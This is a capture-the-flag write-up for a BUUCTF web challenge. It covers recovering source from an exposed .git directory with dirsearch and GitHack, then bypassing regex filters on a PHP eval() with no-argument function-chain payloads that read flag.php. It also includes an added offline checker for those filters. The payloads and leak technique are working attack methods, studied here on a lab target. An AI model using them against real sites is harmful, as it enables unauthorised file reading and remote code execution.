[CTF] git source code leak and code audit

Table of contents

source code acquisition

function bypass

Solution one:

Solution two:

Reference article: 


source code acquisition

The web challenge used here is from BUUCTF: [GXYCTF2019] Matryoshka is prohibited.

Opening the page and viewing its source reveals nothing useful, so start with a directory scan.

The tool used here is dirsearch. Scanning the directory without throttling returned status code 429: the requests were too fast and the site refused them. Adding --delay slows the requests down, and the .git directory then shows up in the results.

python dirsearch.py -u http://5a22cf65-2a27-4b1f-b2bc-9ba0d9b75721.node4.buuoj.cn:81/ --delay 10

This points to GitHack, a .git leak exploitation script that rebuilds and restores the project's source code from the files in the leaked .git folder.

lijiejie/GitHack: A `.git` folder disclosure exploit (github.com)

Read the GitHack introduction carefully: this script must be run with Python 2.

# download the repository archive (git clone cannot fetch a .zip URL)
wget -O GitHack-master.zip https://github.com/lijiejie/GitHack/archive/refs/heads/master.zip
unzip GitHack-master.zip
cd GitHack-master
python2 GitHack.py http://5a22cf65-2a27-4b1f-b2bc-9ba0d9b75721.node4.buuoj.cn:81/.git/

function bypass

Let's take a look at the source code

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>
   

Three if checks must be bypassed in total: the first filters pseudo-protocols (stream wrappers), the second rejects any function call that carries a parameter, and the third blocks a list of function-name fragments.

The special item (?R) in the second regular expression recurses into the whole pattern: `[a-z,_]+\((?R)?\)` matches a function call whose only argument is, optionally, another such call. Any literal argument (a string, a number, a variable) breaks the match, so after preg_replace something other than the bare ';' remains and the check fails. This effectively verifies that every call has no parameters. Because the recursion can nest indefinitely, the surviving form is a(b(c())); which is exactly the shape of a no-parameter RCE.
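To study the three checks without ever reaching eval(), the following added example (not from the challenge or the original post) wraps them in a function that reports which layer rejects a candidate exp value; the sample inputs are constructed for the demonstration.

```php
<?php
// Added example: the three checks from the leaked index.php, reproduced as a
// pure function so the filter can be evaluated offline. No eval() is called.

function check_exp(string $exp): string {
    // Layer 1: block stream wrappers such as php://filter.
    if (preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $exp)) {
        return 'layer1: pseudo-protocol';
    }
    // Layer 2: (?R) recurses the whole pattern, so only nested calls
    // without literal arguments reduce to the bare ';'.
    if (';' !== preg_replace('/[a-z,_]+\((?R)?\)/', '', $exp)) {
        return 'layer2: argument or non-call token present';
    }
    // Layer 3: substring blocklist. Note that "et" also rules out getenv,
    // getallheaders and get_defined_vars, and "info"/"pi" rule out phpinfo.
    if (preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $exp)) {
        return 'layer3: blocked substring';
    }
    return 'pass';
}

// Constructed sample inputs: rejected ones first, then the two payloads
// from the write-up, which reach eval().
$samples = [
    "system('id');",
    "include('php://filter/read=convert.base64-encode/resource=flag.php');",
    "phpinfo();",
    "getenv();",
    "print_r(scandir(current(localeconv())));",
    "highlight_file(next(array_reverse(scandir(current(localeconv())))));",
    "highlight_file(session_id(session_start()));",
];
foreach ($samples as $s) {
    printf("%-72s => %s\n", $s, check_exp($s));
}
```

The first four samples stop at layers 2, 1, 3 and 3 respectively; the last three return pass, which is why the write-up's payloads work.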

No-parameter RCE is usually built from these functions (note that the third check's "et" fragment already rules out the first three in this challenge):

getenv()

getallheaders()

get_defined_vars()

session_id()

dirname()&chdir()

PHP Parametric Function RCE · sky's blog (skysec.top)

Solution one:

First find out which files are in the current directory, using print_r to print the listing:

?exp=print_r(scandir(current(localeconv())));

This is equivalent to print_r(scandir("."));

The final payload is:

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

highlight_file — syntax highlight a file (same as show_source)

next — advances the array's internal pointer by one and returns that element

array_reverse — Returns an array with elements in reverse order

scandir — list files and directories in a specified path

current — returns the current value in the array

localeconv — returns an array containing the locale's numeric and monetary formatting information

The first element of the array returned by localeconv() is the decimal point '.', so current() yields '.' and scandir() receives it, which is equivalent to scandir(".") and lists the files in the current directory. array_reverse() reverses that sorted list so that flag.php lands in the second position; next() then skips the first element and returns the second one, flag.php, which highlight_file() finally prints.

Before that, /?exp=print_r(next(array_reverse(scandir(current(localeconv()))))); can be used to confirm that the returned file name is flag.php; then read it with highlight_file.

http://0c06c480-f5c1-4ad7-a606-f30924efab42.node4.buuoj.cn:81/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

The flag is displayed.

Solution two:

The second way is to use session_id().

This works because the filters above do not block session_id, so session_id can be used to obtain the flag; it has to be combined with session_start() to open the session.

?exp=highlight_file(session_id(session_start()));

Capture the request and set PHPSESSID=flag.php in the Cookie header; session_id() then returns that value and highlight_file() reads the flag.

Reference article: 

No-parameter RCE reference: PHP Parametric Function RCE · sky's blog (skysec.top)

buuctf-[GXYCTF2019] ban nesting dolls_qq_42728977's blog-CSDN blog_buuctf 429


Origin blog.csdn.net/weixin_52450702/article/details/128734182